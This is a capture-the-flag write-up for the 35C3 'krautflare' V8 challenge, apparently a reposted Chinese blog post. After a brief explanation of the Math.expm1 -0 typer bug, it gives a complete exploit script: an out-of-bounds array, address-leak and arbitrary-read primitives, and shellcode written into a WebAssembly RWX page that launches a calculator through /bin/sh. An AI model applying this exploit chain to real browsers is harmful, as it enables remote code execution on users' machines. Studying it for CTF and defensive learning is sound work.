35c3 krautflare
2023-12-24 18:36:03
参考这篇文章可以彻底了解本题的漏洞所在
https://xz.aliyun.com/t/6527
由于Math.expm1经过patch以后的返回值不可能是-0,但是patch的地方是在typer优化中,所以实际上如果没有优化的话是可以返回-0的,这就意味着如果我们先不停地Math.expm1正常执行不返回-0,触发优化,就会导致turbofan认为Math.expm1不可能返回-0,就可以控制一个布尔型变量始终为false,如果再利用这个布尔型变量乘n作为一个数组的下标,最终就会导致checkbounds检查被去除,此时再传入-0让其返回-0,就造成oobarray
获得oobarray的方法如下:
var oobarray=[1.1];
function test(x){
var a = [1.1,2.2,3.3,4.4];
oobarray=[1.1,1.1,1.1];
var c = {x:-0};
var b = Object.is(Math.expm1(x),c.x);
a[b*12]=mem.u2d(0x100000000000);
return oobarray; //a[b * 4];
}
for (var i = 0; i < 100000; i++) {
test("1");
}
test(-0);
得到了oobarray之后就很常规了,版本也不高,怎么做都行。
function hex(x)
{
return '0x' + (x.toString(16)).padStart(16, 0);
}
class Memory{
constructor(){
this.buf = new ArrayBuffer(8);
this.f64 = new Float64Array(this.buf);
this.u32 = new Uint32Array(this.buf);
this.bytes = new Uint8Array(this.buf);
}
d2u(val){ //double ==> Uint64
this.f64[0] = val;
let tmp = Array.from(this.u32);
return tmp[1] * 0x100000000 + tmp[0];
}
u2d(val){ //Uint64 ==> double
let tmp = [];
tmp[0] = parseInt(val % 0x100000000);
tmp[1] = parseInt((val - tmp[0]) / 0x100000000);
this.u32.set(tmp);
return this.f64[0];
}
}
var mem=new Memory();
var oobarray=[1.1];
function test(x){
var a = [1.1,2.2,3.3,4.4];
oobarray=[1.1,1.1,1.1];
var c = {x:-0};
var b = Object.is(Math.expm1(x),c.x);
a[b*12]=mem.u2d(0x100000000000);
return oobarray; //a[b * 4];
}
for (var i = 0; i < 100000; i++) {
test("1");
}
test(-0);
var arbf=new ArrayBuffer(0x1234);
var obj={'target':0x5678};
var bk_idx=0;
var obj_idx=0;
for(let i=0;i<0x300;i++)
{
let tmp=mem.d2u(oobarray[i]);
if(tmp==0x567800000000)
{
obj_idx=i;
break;
}
}
for(let i=0;i<0x300;i++)
{
let tmp=mem.d2u(oobarray[i]);
if(tmp==0x1234)
{
bk_idx=i+1;
break;
}
}
function addressof(object)
{
obj.target=object;
return mem.d2u(oobarray[obj_idx]);
}
function read64(address)
{
oobarray[bk_idx]=mem.u2d(address);
var dt=new DataView(arbf);
return mem.d2u(dt.getFloat64(0,true));
}
var wasmCode = new Uint8Array([0,97,115,109,1,0,0,0,1,133,128,128,128,0,1,96,0,1,127,3,130,128,128,128,0,1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,128,128,0,0,7,145,128,128,128,0,2,6,109,101,109,111,114,121,2,0,4,109,97,105,110,0,0,10,138,128,128,128,0,1,132,128,128,128,0,0,65,42,11]);
var wasmModule = new WebAssembly.Module(wasmCode);
var wasmInstance = new WebAssembly.Instance(wasmModule, {});
let wasmFunc = wasmInstance.exports.main;
var inst_addr=addressof(wasmInstance);
var rwx_addr=read64(inst_addr+0xe8-1);
console.log("[*] inst_addr is "+hex(inst_addr));
console.log("[*] rwx_addr is "+hex(rwx_addr));
oobarray[bk_idx]=mem.u2d(rwx_addr);
var dt=new DataView(arbf);
const shellcode = new Uint8Array([0x6a,0x3b,0x58,0x99,0x48,0xbb,0x2f,0x62,0x69,0x6e,0x2f,0x73,0x68,0x00,0x53,0x48,0x89,0xe7,0x68,0x2d,0x63,0x00,0x00,0x48,0x89,0xe6,0x52,0xe8,0x1c,0x00,0x00,0x00,0x44,0x49,0x53,0x50,0x4c,0x41,0x59,0x3d,0x3a,0x30,0x20,0x67,0x6e,0x6f,0x6d,0x65,0x2d,0x63,0x61,0x6c,0x63,0x75,0x6c,0x61,0x74,0x6f,0x72,0x00,0x56,0x57,0x48,0x89,0xe6,0x0f,0x05]);
for (var i=0;i<shellcode.length;i++) {
dt.setUint8(i,shellcode[i], true);
}
//%DebugPrint(oobarray);
//%DebugPrint(shellcode);
//%SystemBreak();
wasmFunc();
文章来源:https://blog.csdn.net/weixin_46483787/article/details/135183067
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。 如若内容造成侵权/违法违规/事实不符,请联系我的编程经验分享网邮箱:veading@qq.com进行投诉反馈,一经查实,立即删除!
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。 如若内容造成侵权/违法违规/事实不符,请联系我的编程经验分享网邮箱:veading@qq.com进行投诉反馈,一经查实,立即删除!